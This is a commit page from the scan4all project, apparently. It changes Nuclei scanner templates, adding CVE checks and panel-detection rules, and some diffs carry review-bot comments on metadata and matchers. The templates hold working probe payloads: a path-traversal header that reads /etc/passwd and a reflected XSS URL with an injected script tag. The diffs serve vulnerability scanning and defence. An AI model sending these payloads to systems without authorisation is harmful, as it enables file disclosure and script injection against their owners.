Projects STRLCPY scan4all Commits ce9bf55e
  • ■ ■ ■ ■ ■
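--- a/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml
+++ b/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml
@@ -20,17 +20,21 @@
  - method: GET
  path:
  - "{{BaseURL}}"
+
  headers:
  Accept: ../../../../../../../../etc/passwd{{
+
  matchers-condition: and
  matchers:
  - type: status
  status:
  - 200
+ - 500
+
  - type: regex
+ part: body
  regex:
  - "root:.*:0:0:"
- part: body
 
 # Enhanced by mp on 2022/04/12
 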
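Review bot: The status matcher now accepts `500` as well as `200`, but nothing in the template records why, so a later maintainer cannot tell whether the server-error case was observed on a vulnerable target or added speculatively. A one-line comment above the status list would settle it, for example `# 500 accepted: <reason / affected version where the file is still returned>`. Because `matchers-condition: and` still requires the `root:.*:0:0:` regex in the body, the extra status alone should not widen matches, but the reason belongs in the file.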
  • ■ ■ ■ ■
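--- a/config/nuclei-templates/cves/2022/CVE-2022-29548.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-29548.yaml
@@ -18,7 +18,7 @@
  metadata:
  google-query: inurl:"carbon/admin/login"
  verified: "true"
- tags: cve,cve2022,wso2,xss
+ tags: cve,cve2022,wso2,xss,packetstorm
 
 requests:
  - method: GET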
  • ■ ■ ■ ■ ■ ■
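--- a/config/nuclei-templates/cves/2022/CVE-2022-31299.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-31299.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-31299
+
+info:
+ name: Haraj v3.7 - Cross Site Scripting
+ author: edoardottt
+ severity: medium
+ description: |
+ Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
+ reference:
+ - https://github.com/bigzooooz/CVE-2022-31299
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31299
+ - https://angtech.org
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-31299
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,haraj,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '><script>alert(document.domain)</script></textarea>'
+ - 'content="nextHaraj'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+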
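Review bot: The `info` block has no `remediation` entry and the description does not name the reflected parameter, so a finding from this template gives the person triaging it little to act on. The request shows the input travelling in `note` on `payform.php`, and the description could say so, e.g. `... vulnerability in the User Upgrade Form via the note parameter of payform.php.` A `remediation:` line pointing at the vendor fix, once one is confirmed, would complete the record.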
  • ■ ■ ■ ■ ■ ■
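--- a/config/nuclei-templates/cves/2022/CVE-2022-35413.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-35413.yaml
@@ -11,7 +11,10 @@
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
  - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
  classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
  cve-id: CVE-2022-35413
+ cwe-id: CWE-798
  metadata:
  shodan-query: http.title:"Intelligent WAPPLES"
  verified: "true"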
  • ■ ■ ■ ■ ■ ■
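--- a/config/nuclei-templates/cves/2022/CVE-2022-40734.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-40734.yaml
@@ -3,17 +3,20 @@
 info:
  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
  author: arafatansari
- severity: high
+ severity: medium
  description: |
  UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
  reference:
  - https://github.com/UniSharp/laravel-filemanager/issues/1150
  - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
  classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
  cve-id: CVE-2022-40734
+ cwe-id: CWE-22
  metadata:
- verified: true
  shodan-query: http.html:"Laravel Filemanager"
+ verified: "true"
  tags: cve,cve2022,laravel,unisharp,lfi,traversal
 
 requests: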
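Review bot: The added vector carries `PR:L`, yet the description still reads as if any client can use `download?working_dir=%2F..`; if the lower severity rests on the traversal needing a logged-in user, the description should say so. A short addition such as `Requires an authenticated user.` would keep the text consistent with `severity: medium` and `cvss-score: 6.5`. The request block is collapsed on this page, so whether the template itself sends credentials cannot be checked from here.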
  • ■ ■ ■ ■ ■ ■
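--- a/config/nuclei-templates/exposed-panels/bitdefender-gravityzone.yaml
+++ b/config/nuclei-templates/exposed-panels/bitdefender-gravityzone.yaml
@@ -0,0 +1,27 @@
+id: bitdefender-gravityzone
+
+info:
+ name: Bitdefender GravityZone
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: title:"Bitdefender GravityZone"
+ tags: panel,bitdefender
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<title>Bitdefender GravityZone</title>'
+
+ - type: status
+ status:
+ - 200
+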
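Review bot: `verified: true` is written as a YAML boolean here, while the CVE templates in this same commit use the quoted string `verified: "true"`, and CVE-2022-40734 is changed from the boolean to the string form. The same boolean appears in darktrace-threat-visualizer, datadog-login, sentinelone-console and webroot-login. Writing `verified: "true"` in all five keeps the metadata type uniform for any tooling that filters on it.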
  • ■ ■ ■ ■ ■ ■
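--- a/config/nuclei-templates/exposed-panels/darktrace-threat-visualizer.yaml
+++ b/config/nuclei-templates/exposed-panels/darktrace-threat-visualizer.yaml
@@ -0,0 +1,27 @@
+id: darktrace-threat-visualizer
+
+info:
+ name: Darktrace Threat Visualizer
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: html:"Darktrace Threat Visualizer"
+ tags: panel,darktrace
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<title>Login | Darktrace Threat Visualizer</title>'
+
+ - type: status
+ status:
+ - 200
+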
  • ■ ■ ■ ■ ■ ■
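--- a/config/nuclei-templates/exposed-panels/datadog-login.yaml
+++ b/config/nuclei-templates/exposed-panels/datadog-login.yaml
@@ -0,0 +1,27 @@
+id: datadog-login
+
+info:
+ name: Datadog Login Panel
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: title:"Datadog"
+ tags: panel,datadog
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/account/login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<title>Datadog: Log In</title>'
+
+ - type: status
+ status:
+ - 200
+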
  • ■ ■ ■ ■ ■ ■
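--- a/config/nuclei-templates/exposed-panels/sentinelone-console.yaml
+++ b/config/nuclei-templates/exposed-panels/sentinelone-console.yaml
@@ -0,0 +1,27 @@
+id: sentinelone-console
+
+info:
+ name: SentinelOne - Management Console
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: title:"SentinelOne - Management Console"
+ tags: panel,sentinelone
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'SentinelOne - Management Console'
+
+ - type: status
+ status:
+ - 200
+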
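Review bot: The body matcher looks for the bare phrase `SentinelOne - Management Console`, whereas the other panel templates in this commit anchor on the full `<title>…</title>` element. Any page served with status 200 at `/login` that merely mentions the phrase would be reported as the console, which inflates an exposure inventory with false positives. If the console's title element is exactly that text, `- '<title>SentinelOne - Management Console</title>'` would be tighter; the page does not show the console's markup, so this needs checking against a real instance.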
  • ■ ■ ■ ■ ■ ■
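--- a/config/nuclei-templates/exposed-panels/webroot-login.yaml
+++ b/config/nuclei-templates/exposed-panels/webroot-login.yaml
@@ -0,0 +1,27 @@
+id: webroot-login
+
+info:
+ name: Webroot - Login
+ author: DhiyaneshDK
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: title:"Webroot - Login"
+ tags: panel,webroot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<title>Webroot - Login</title>'
+
+ - type: status
+ status:
+ - 200
+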